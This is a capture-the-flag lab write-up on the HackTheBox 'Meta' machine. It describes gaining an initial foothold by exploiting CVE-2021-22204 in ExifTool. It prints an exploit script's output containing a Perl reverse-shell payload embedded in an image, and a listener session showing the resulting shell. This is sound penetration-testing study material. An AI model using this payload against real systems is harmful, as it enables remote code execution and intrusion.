InfoSec LAB

Meta_Exploitation

Created: 2 min read

CVE-2021-22204

The target web application is suspected to be using exiftool in the backend to process the uploaded images in order to display the metadata back to users. Although various different techniques were used in attempt to exploit the feature, nothing seemed to work, leaving me the only option It is not confirmed whether or not if exiftool present in the backend is vulnerable at this point, but I can still give it a lot

┌──(kali㉿kali)-[~/archive/htb/labs/meta]
└─$ python3 CVE-2021-22204.py -s 10.10.14.3 443                          
 
        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
unicord: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution
payload: (metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(443,inet_aton('10.10.14.3')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};")
depends: Dependencies for exploit are met!
prepare: Payload written to file!
prepare: Payload file compressed!
prepare: DjVu file created!
prepare: JPEG image created/processed!
prepare: Exiftool config written to file!
exploit: Payload injected into image!
cleanup: Old file artifacts deleted!
success: Exploit image written to "image.jpg"

while the [[meta_cve-2021-22204#exploit|exploit]] gives a few options to embed arbitrary commands into an image file, it also support generating one and embed commands to it

Then I just need to upload it. The backend will run this image with exiftool If it’s the vulnerable version, the embedded reverse shell will be executed

┌──(kali㉿kali)-[~/archive/htb/labs/meta]
└─$ nnc 443 
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.140] 42466
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
meta
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.140  netmask 255.255.254.0  broadcast 10.10.11.255
        ether 00:50:56:b9:20:93  txqueuelen 1000  (Ethernet)
        RX packets 3375839  bytes 663079419 (632.3 MiB)
        RX errors 0  dropped 19  overruns 0  frame 0
        TX packets 3370608  bytes 1258338185 (1.1 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 11141  bytes 856516 (836.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11141  bytes 856516 (836.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Session established The backend exiftool that the target web application is using confirmed to be vulnerable initial foothold established to the target system via exploiting [[meta_cve-2021-22204#cve-2021-22204|CVE-2021-22204]] present in the target web app

Interactive Graph View

Backlinks